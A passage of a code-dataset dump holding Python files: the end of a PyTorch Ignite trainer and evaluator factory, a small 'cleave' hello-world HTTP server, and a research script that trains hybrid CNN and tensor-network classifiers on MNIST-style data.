False\n\n if on_tpu:\n try:\n import torch_xla.core.xla_model as xm\n except ImportError:\n raise RuntimeError(\"In order to run on TPU, please install PyTorch XLA\")\n\n def _update(engine: Engine, batch: Sequence[torch.Tensor]) -> Union[Any, Tuple[torch.Tensor]]:\n model.train()\n optimizer.zero_grad()\n x, y = prepare_batch(batch, device=device, non_blocking=non_blocking)\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n loss.backward()\n\n if on_tpu:\n xm.optimizer_step(optimizer, barrier=True)\n else:\n optimizer.step()\n\n return output_transform(x, y, y_pred, loss)\n\n trainer = Engine(_update)\n\n return trainer\n\n\ndef create_supervised_evaluator(\n model: torch.nn.Module,\n metrics: Optional[Dict[str, Metric]] = None,\n device: Optional[Union[str, torch.device]] = None,\n non_blocking: bool = False,\n prepare_batch: Callable = _prepare_batch,\n output_transform: Callable = lambda x, y, y_pred: (y_pred, y),\n) -> Engine:\n \"\"\"\n Factory function for creating an evaluator for supervised models.\n\n Args:\n model (`torch.nn.Module`): the model to train.\n metrics (dict of str - :class:`~ignite.metrics.Metric`): a map of metric names to Metrics.\n device (str, optional): device type specification (default: None).\n Applies to batches after starting the engine. Model *will not* be moved.\n non_blocking (bool, optional): if True and this copy is between CPU and GPU, the copy may occur asynchronously\n with respect to the host. For other cases, this argument has no effect.\n prepare_batch (callable, optional): function that receives `batch`, `device`, `non_blocking` and outputs\n tuple of tensors `(batch_x, batch_y)`.\n output_transform (callable, optional): function that receives 'x', 'y', 'y_pred' and returns value\n to be assigned to engine's state.output after each iteration. Default is returning `(y_pred, y,)` which fits\n output expected by metrics. If you change it you should use `output_transform` in metrics.\n\n Note:\n `engine.state.output` for this engine is defind by `output_transform` parameter and is\n a tuple of `(batch_pred, batch_y)` by default.\n\n .. warning::\n\n The internal use of `device` has changed.\n `device` will now *only* be used to move the input data to the correct device.\n The `model` should be moved by the user before creating an optimizer.\n\n For more information see:\n\n * `PyTorch Documentation `_\n * `PyTorch's Explanation `_\n\n Returns:\n Engine: an evaluator engine with supervised inference function.\n \"\"\"\n metrics = metrics or {}\n\n def _inference(engine: Engine, batch: Sequence[torch.Tensor]) -> Union[Any, Tuple[torch.Tensor]]:\n model.eval()\n with torch.no_grad():\n x, y = prepare_batch(batch, device=device, non_blocking=non_blocking)\n y_pred = model(x)\n return output_transform(x, y, y_pred)\n\n evaluator = Engine(_inference)\n\n for name, metric in metrics.items():\n metric.attach(evaluator, name)\n\n return evaluator\n"} {"ext": "py", "sha": "1a309559cbdfd179310e5f0728e67d6420555e8b", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom cleave import server\n\n\nclass MyServer(server.BaseServer):\n \"\"\"\n My HTTP Server\n \"\"\"\n def client_handler(self, client):\n \"\"\"\n Handles a client connection\n :param client: server.BaseClient \n :return: None\n \"\"\"\n client.send('HTTP/1.1 200 OK\\n')\n client.send('Content-Type: text/html; charset=utf-8\\n\\n')\n\n client.send('

    Hello world

    ')\n\n client.send('

    My Address:

    ')\n client.send('
    {}:{}
    '.format(client.addr[0], client.addr[1]))\n\n client.send('

    Request body:

    ')\n client.send('
    {}
    '.format(client.message))\n \n client.send('
    By Cleave Server 0.13 Beta')\n\n\nif __name__ == '__main__':\n MyServer(port=80)"} {"ext": "py", "sha": "1a309735db48975894985b294fbedb43dcf9005c", "content": "from torch import nn\r\nimport torch as tc\r\nimport numpy as np\r\nimport BasicFun as bf\r\nimport time\r\nimport os\r\nimport sys\r\nfrom termcolor import cprint\r\nimport matplotlib\r\nfrom matplotlib.pyplot import plot, savefig, figure\r\nfrom TensorNetworkExpasion import TTN_basic, Vectorization, TTN_Pool_2by2to1, \\\r\n num_correct, load_tensor_network, save_tensor_network,\\\r\n test_accuracy_mnist, pre_process_dataset, Attention_FC, Attention_Con2d, \\\r\n TTN_Pool_2xto1, TTN_Pool_2yto1, TTN_ConvTI_2by2to1, TTN_PoolTI_2by2to1\r\n\r\n# matplotlib.use('Agg')\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg1():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg1'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg1_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg1_BP, self).__init__(num_layers=6)\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.att = Attention_FC(64*4, 16, para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.005\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = self.att(x.reshape(num, -1))\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4, 5]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg2():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg2'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg2_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg2_BP, self).__init__(num_layers=6)\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.005\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4, 5]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg3():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg3'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg3_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg3_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.01\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg4():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg4'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg4_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg4_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.005\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg5():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg5'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg5_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg5_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.02\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4, 5]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\n# ==========================================================\r\ndef tn_multi_classifier_CNNBTN_mnist(para=None):\r\n logger = bf.logger(para['log_name']+'.log', level='info')\r\n log = logger.logger.info\r\n t0 = time.time()\r\n if para is None:\r\n para = parameter_default()\r\n para = make_para_consistent(para)\r\n log('=' * 15)\r\n log('Using device: ' + str(para['device']))\r\n log('=' * 15)\r\n bf.print_dict(para)\r\n\r\n labels2mat = (para['loss_func'] == 'MSELoss')\r\n if para['TN'] == 'MPS':\r\n data_dim = 2\r\n else:\r\n data_dim = 5\r\n train_loader, test_loader = bf.load_mnist_and_batch(\r\n para['dataset'], para['classes'], para['num_samples'], None, para['batch_size'],\r\n data_dim=data_dim, labels2mat=labels2mat, channel=len(para['classes']),\r\n project_name=para['project'], dev=para['device'])\r\n\r\n train_loader, train_num_tot = pre_process_dataset(\r\n train_loader, para, para['device'])\r\n test_loader, test_num_tot = pre_process_dataset(\r\n test_loader, para, para['device'])\r\n\r\n img = train_loader[7][0].reshape(train_loader[3][0].shape[0], -1)\r\n img = img[3, :].reshape(28, 28)\r\n matplotlib.pyplot.imshow(img.cpu())\r\n matplotlib.pyplot.show()\r\n input()\r\n\r\n num_batch_train = len(train_loader)\r\n log('Num of training samples:\\t' + str(train_num_tot))\r\n log('Num of testing samples:\\t' + str(test_num_tot))\r\n log('Num of training batches:\\t' + str(num_batch_train))\r\n log('Num of features:\\t' + str(para['length']))\r\n log('Dataset finish processed...')\r\n\r\n loss_func = tc.nn.CrossEntropyLoss()\r\n\r\n tn = eval(para['TN'] + '_BP(para)')\r\n info = dict()\r\n info['train_acc'] = list()\r\n info['train_loss'] = list()\r\n info['test_acc'] = list()\r\n info['norm_coeff'] = list()\r\n if para['normalize_tensors'] is not None:\r\n tn.normalize_all_tensors(para['normalize_tensors'])\r\n\r\n nc = test_accuracy_mnist(tn, test_loader, para)\r\n log('Initially, we have test acc = ' + str(nc / test_num_tot))\r\n\r\n parameters_cnn = nn.ParameterList()\r\n parameters_btn = nn.ParameterList()\r\n for x in tn.parameters():\r\n if x.ndimension() in [7, 9]:\r\n parameters_btn.append(x)\r\n else:\r\n parameters_cnn.append(x)\r\n\r\n if parameters_cnn.__len__() > 0:\r\n optimizer_cnn = tc.optim.Adam(parameters_cnn, lr=para['lr'][0])\r\n if parameters_btn.__len__() > 0:\r\n optimizer_btn = tc.optim.Adam(parameters_btn, lr=para['lr'][1])\r\n\r\n log('Start training...')\r\n log('[Note: data will be save at: ' + para['data_path'] + ']')\r\n coeff_norm = 0\r\n if para['if_test']:\r\n titles = 'Epoch \\t train_loss \\t train_acc \\t test_acc \\t norm_coeff'\r\n else:\r\n titles = 'Epoch \\t train_loss \\t train_acc \\t norm_coeff'\r\n log(titles)\r\n\r\n for t in range(para['it_time']):\r\n t_loop = time.time()\r\n train_loss = 0\r\n nc = 0\r\n if (num_batch_train > 1) and (t > 0):\r\n train_loader = bf.re_batch_data_loader(train_loader)\r\n for imgs, labels in train_loader:\r\n imgs, labels = imgs.to(para['device']), labels.to(para['device'])\r\n\r\n y = tn(imgs)\r\n loss = loss_func(y, labels)\r\n with tc.no_grad():\r\n train_loss += loss.data.item()\r\n\r\n loss.backward()\r\n\r\n for x in tn.parameters():\r\n if x.ndimension() in [7, 9]:\r\n s = x.shape\r\n # put grad in tangent space\r\n inner = tc.einsum('ac,ac->a', x.data.view(-1, s[-1]),\r\n x.grad.data.view(-1, s[-1]))\r\n grad = x.grad.data.view(-1, s[-1]) - tc.einsum(\r\n 'a,ab->ab', inner, x.data.view(-1, s[-1]))\r\n # normalize grad\r\n norm = grad.norm(dim=1, p=2) + 1e-12\r\n grad = tc.einsum('ab,a->ab', grad, 1 / norm)\r\n # print(tc.einsum('ac,ac->a', grad, x.data.view(-1, s[-1])))\r\n x.grad.data = grad.view(s)\r\n\r\n if parameters_cnn.__len__() > 0:\r\n optimizer_cnn.step()\r\n optimizer_cnn.zero_grad()\r\n if parameters_btn.__len__() > 0:\r\n optimizer_btn.step()\r\n optimizer_btn.zero_grad()\r\n\r\n for x in tn.parameters():\r\n if x.ndimension() in [7, 9]:\r\n s = x.shape\r\n x = x.view(-1, s[-1])\r\n norm = x.data.norm(\r\n dim=1, p=2)\r\n x.data[:, :] = tc.einsum(\r\n 'ab,a->ab', x.data, 1 / norm)\r\n x.data = x.data.view(s)\r\n\r\n if ((t + 1) % para['check_time']) == 0:\r\n nc0, _ = num_correct(labels, y.data)\r\n nc += nc0\r\n if ((t + 1) % para['check_time']) == 0:\r\n info['train_acc'].append(nc / train_num_tot)\r\n info['train_loss'].append(train_loss)\r\n info['norm_coeff'].append(coeff_norm)\r\n message = str(t + 1) + ': '\r\n message += '\\t %.6g' % info['train_loss'][-1]\r\n message += '\\t %.6g' % info['train_acc'][-1]\r\n if para['if_test']:\r\n nc = test_accuracy_mnist(\r\n tn, test_loader, para)\r\n info['test_acc'].append(nc / test_num_tot)\r\n message += '\\t %.6g' % info['test_acc'][-1]\r\n message += '\\t %.6g' % info['norm_coeff'][-1]\r\n log(message)\r\n if ((t+1) % para['save_time']) == 0:\r\n if (train_loss == float('nan')) or (train_loss == float('inf')):\r\n cprint('DO NOT save MPS since NAN/INF appears', color='red')\r\n sys.exit(1)\r\n else:\r\n info['time_1loop'] = time.time() - t_loop\r\n save_tensor_network(tn, para, info,\r\n para['data_path'], para['data_exp'])\r\n log('MPS saved: time cost per epoch = ' + str(info['time_1loop']))\r\n log(titles)\r\n x = np.arange(para['it_time'])\r\n fig = figure()\r\n plot(x, info['test_acc'])\r\n savefig('../results/' + para['TN'] + '_test_acc.png')\r\n\r\n info['time_tot'] = time.time() - t0\r\n log('Total time cost = ' + str(info['time_tot']))\r\n return para['data_path'], para['data_exp']\r\n\r\n\r\ndef parameter_default():\r\n para = dict()\r\n para['project'] = 'CNNBTNhybrid'\r\n para['which_TN_set'] = 'tne' # 'tne' or 'ctnn'\r\n para['TN'] = 'MPS'\r\n\r\n para['dataset'] = 'fashion-mnist'\r\n para['classes'] = list(range(10))\r\n para['num_samples'] = ['all'] * para['classes'].__len__()\r\n para['batch_size'] = 3000\r\n\r\n para['binary_imgs'] = False\r\n para['cut_size'] = [28, 28]\r\n para['img_size'] = [28, 28]\r\n # to feature cut-off; not usable yet\r\n para['update_f_index'] = False\r\n para['tol_cut_f'] = 1e-12\r\n\r\n para['it_time'] = 200\r\n para['lr'] = [1e-4, 1e-2]\r\n para['d'] = 2\r\n para['chi'] = 2\r\n\r\n para['linear_gauss_noise'] = None\r\n para['pre_normalize_mps'] = 1\r\n para['normalize_mps'] = False\r\n para['optimizer'] = 'Adam'\r\n para['mps_init'] = 'No.1'\r\n para['feature_map'] = 'taylor'\r\n para['feature_theta'] = 1\r\n para['activate_fun'] = None\r\n para['activate_fun_final'] = None\r\n para['Lagrangian'] = None\r\n para['Lagrangian_way'] = 0\r\n para['norm_p'] = 1\r\n para['loss_func'] = 'CrossEntropyLoss' # MSELoss, CrossEntropyLoss, NLLLoss\r\n\r\n para['check_time'] = 2\r\n para['save_time'] = 20\r\n para['if_test'] = True\r\n para['if_load'] = True\r\n para['if_load_smaller_chi'] = True\r\n para['clear_history'] = False\r\n para['normalize_tensors'] = None\r\n para['update_way'] = 'bp'\r\n para['multi_gpu_parallel'] = False\r\n\r\n para['log_name'] = 'record'\r\n para['device'] = 'cuda'\r\n\r\n para = make_para_consistent(para)\r\n return para\r\n\r\n\r\ndef make_para_consistent(para):\r\n if 'TN' not in para:\r\n para['TN'] = 'MPS'\r\n if 'norm_p' not in para:\r\n para['norm_p'] = 1\r\n if 'binary_imgs' not in para:\r\n para['binary_imgs'] = False\r\n if para['TN'] != 'MPS':\r\n para['normalize_mps'] = False\r\n para['activate_fun'] = None\r\n para['activate_fun_final'] = None\r\n para['data_path'] = './'\r\n if para['feature_map'] == 'fold_2d_order1':\r\n para['img_size'] = [round(para['img_size'][0]/2),\r\n round(para['img_size'][1]/2)]\r\n if para['feature_map'].lower() in ['normalized_linear',\r\n 'relsig', 'tansig', 'vsigmoid']:\r\n if para['d'] != 2:\r\n bf.warning('Warning: Inconsistent para[\\'d\\']=%g to '\r\n 'feature map. Please check...' % para['d'])\r\n para['d'] = 2\r\n if para['feature_map'].lower() == 'reltansig':\r\n if para['d'] != 3:\r\n bf.warning('Warning: Inconsistent para[\\'d\\']=%g to '\r\n 'feature map. Please check...' % para['d'])\r\n para['d'] = 3\r\n para['length'] = para['img_size'][0] * para['img_size'][1]\r\n if 'feature_index' not in para:\r\n para['feature_index'] = None\r\n elif para['feature_index'] is not None:\r\n if len(para['feature_index']) > para['length']:\r\n bf.warning('Error: length > len(feature_index).')\r\n sys.exit(1)\r\n elif max(para['feature_index']) > (para['length'] - 1):\r\n bf.warning('Error: feature_index.max() > len(feature_index).')\r\n sys.exit(1)\r\n else:\r\n para['length'] 